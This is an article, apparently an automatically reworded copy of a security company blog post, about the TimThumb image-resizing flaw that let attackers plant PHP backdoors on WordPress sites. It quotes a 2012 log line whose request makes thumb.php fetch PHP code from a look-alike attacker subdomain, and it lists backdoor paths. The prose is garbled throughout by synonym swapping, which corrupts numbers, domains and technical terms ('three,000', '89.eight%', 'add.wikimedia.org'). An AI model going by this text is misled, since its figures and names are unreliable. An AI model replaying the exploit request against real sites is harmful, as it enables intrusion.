TimThumb Assaults: The Scale of Legacy Malware Infections

TimThumb Assaults: The Scale of Legacy Malware Infections

As of late, we think about a malware marketing campaign huge if it impacts a pair thousand web sites. Nonetheless, again within the day when Sucuri first began its operations, the size of infections was considerably bigger — and it was fairly typical to see a whole lot of 1000’s of internet sites affected by the identical malware.

This was principally as a result of early variations of CMS’ weren’t very safe however already common sufficient to energy thousands and thousands of internet sites. Extension builders additionally didn’t hassle a lot about safety. The entire ecosystem was very younger. And with the dearth of options, even beginner plugins and themes had a superb likelihood of being adopted by a lot of web sites.

On the time, most CMS’ didn’t have any severe safety plugins. Web site utility firewalls weren’t usually used outdoors of firms. This all result in conditions the place vulnerabilities resulted in tens (or generally even a whole lot) of 1000’s of contaminated web sites inside a really brief time. One other frequent supply of huge infections was malware that stole web site credentials from the computer systems of site owners.

Blast From the WordPress Previous: TimThumb Vulnerability

One of the vital well-known assaults within the WordPress ecosystem throughout 2011-2014 was the exploitation of the TimThumb vulnerability.

TimThumb was a easy PHP script used for resizing photos. A lot of common WordPress themes and plugins used this script.

Again in 2011, a vulnerability on this script was found which allowed attackers to add PHP information to web sites utilizing TimThumb.

Again in these days, David Dede was busy writing concerning the lately discovered vulnerability on our Weblog (yeah – I agree, our vulnerability evaluation articles are a lot better now). In these articles, he described the scope and impression for affected themes, plugins and infections.

TimThumb Exploit Leverages Flawed Implementation

The exploit used TimThumb’s characteristic to create thumbnails of photos saved on trusted third-party websites. To be able to resize these photos, the information wanted to be downloaded and saved in a cache listing in order that the script didn’t need to obtain them each time.

This characteristic labored utilizing a easy GET request: timthumb.php?src=http://trusted-site.tld/picture.gif

Since these kinds of GET requests will be simply modified to obtain arbitrary information from the web, the developer tried to make sure that no information may very well be erroneously downloaded. To perform this, the script checked the header of the file and recognized whether or not the URL matched the record of trusted websites. Nonetheless, because it normally occurs, this good thought was “ruined” by flawed implementation.

Vulnerability Results in Malicious Code Execution & Backdoors

Whereas checking for a file header might sound like a good suggestion, it doesn’t have in mind that PHP can ignore something outdoors of the tags. Which means that hackers can add malicious PHP code on the finish of an actual picture and their code might be executed every time the file is requested.

This may not be an enormous drawback if the script solely downloads information from trusted websites which can be unlikely to host malware. Nonetheless, TimThumb solely checked that the start of the URL matched common lists of web sites like:

  • blogger.com
  • flickr.com
  • wordpress.com
  • picasa.com
  • img.youtube.com
  • photobucket.com
  • tinypic.com
  • add.wikimedia.org

This method fully uncared for the chance URL starting with “http://blogger.com” may not belong to a blogger.com web site.

For instance, “http://blogger.com.instance.com” or “http://blogger.neighborhood.instance.com” would efficiently move the examine that had been carried out for TimThumb.

Together with a couple of different inconsiderate coding practices, this made the timthumb.php file (generally renamed to thumb.php) an ideal penetration level for hackers. Attackers used it to add backdoors and keep entry to weak web sites.

Listed below are a couple of examples of uploaded cached backdoors seen from this vulnerability:

/wp-content/themes/PersonalPress/cache/34e3a3a74f6e2d0f236bdd3ba70c0c03.php
/wp-content/plugins/uBillboard/cache/39c7c6041111f8eb22deaa310e1f2f7c.php
/wp-content/uploads/thumb-temp/b712fe675191c264b1326871cd5f3d0c.php

Malicious Subdomains on Compromised Websites

When reviewing  web site logs again in 2012, it was typical to seek out requests just like the one under, which tried to use the TimThumb vulnerability.

95.128.204.x - - [01/May/2012:23:31:33 +0200] "GET //wp-content/themes/LondonLive/thumb.php?src=hxxp://picasa.com.kereny[.]ro/go.php HTTP/1.1" 200 415 instance.com "-" "Mozilla/four.eight [en] (Home windows NT 5.zero; U)" "-"

Hackers created subdomains that matched the websites that TimThumb trusted by default. Within the pattern seen above, the second stage area belonged to an actual, professional web site.

Again then, hackers hijacked the DNS settings of 1000’s of internet sites and created subdomains that pointed to their very own servers which hosted backdoors and different malware.

Backdoors Discovered on Hundreds of Compromised Websites

Throughout a single yr, from March 2012 to February 2013, Sucuri recorded greater than three,000 URLs of backdoors utilized in TimThumb assaults on our shopper websites. Yow will discover the complete record right here: https://pastebin.com/fKJt83ic

After all, not all of those three,000+ URLs are distinctive — and we had registered a number of backdoors related to the identical second-level domains. However nonetheless, this consists of 1,200+ distinctive domains which had been compromised by hackers simply to serve backdoors off of their subdomains. If seen in the present day, this quantity could be thought-about important for all the wave of a malware marketing campaign. As you may think about, the variety of compromised websites leveraging the TimThumb vulnerability was bigger by orders of magnitude.

TimThumb Utilization Statistics

On September 2014, Ben Gillbanks, who took over TimThumb’s growth in 2009, wrote an article asserting the software’s finish of life and assist.

Regardless of the “If you wish to use TimThumb, then you definitely accomplish that at your personal threat!” alert made by Ben, persons are nonetheless utilizing it.

I used to be capable of collect some data on our Incident Response logs from January 2017 to August 2019 and the variety of websites operating the software was a lot larger than I anticipated — particularly because it’s been defunct for five years now.

Checking the 2512 websites we’ve scanned in 2019 that comprise this software, a complete of 89.eight% of them have been internet hosting at the least one identified malicious file. Which means that there’s nonetheless a possible for an infection utilizing all the identified TimThumb vulnerabilities. It additionally showcases the significance of solely utilizing third-party elements which can be actively developed and maintained.

Web Safety: Leaps and Bounds

So, why hassle even releasing this data in 2019? We’ve compiled this information with the intention of serving to you, our reader, recognize how far more safe the web has develop into previously decade.

The expansion within the web site house is critical. CMS cores don’t have important safety points. Builders of common themes and plugins have skilled their share of vulnerability-related issues and now write safer code to guard their set up bases. Internet hosting suppliers do a greater job of isolating accounts and rapidly deal with infections on their shoppers’ websites. Increasingly researchers evaluation the code of common CMS’ and their extensions, and apply accountable disclosure which helps to mitigate safety issues a lot quicker than a couple of years in the past. After all, now and again we nonetheless see some huge infections, although they’re not practically on the scale seen even 5 years in the past.

Sucuri clients who’re behind our web site firewall are robotically shielded from these kinds of huge infections. If you’re the sufferer of a web site compromise or assume you might have backdoors or different malicious information, we’d be completely happy to assist take away malware out of your web site.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.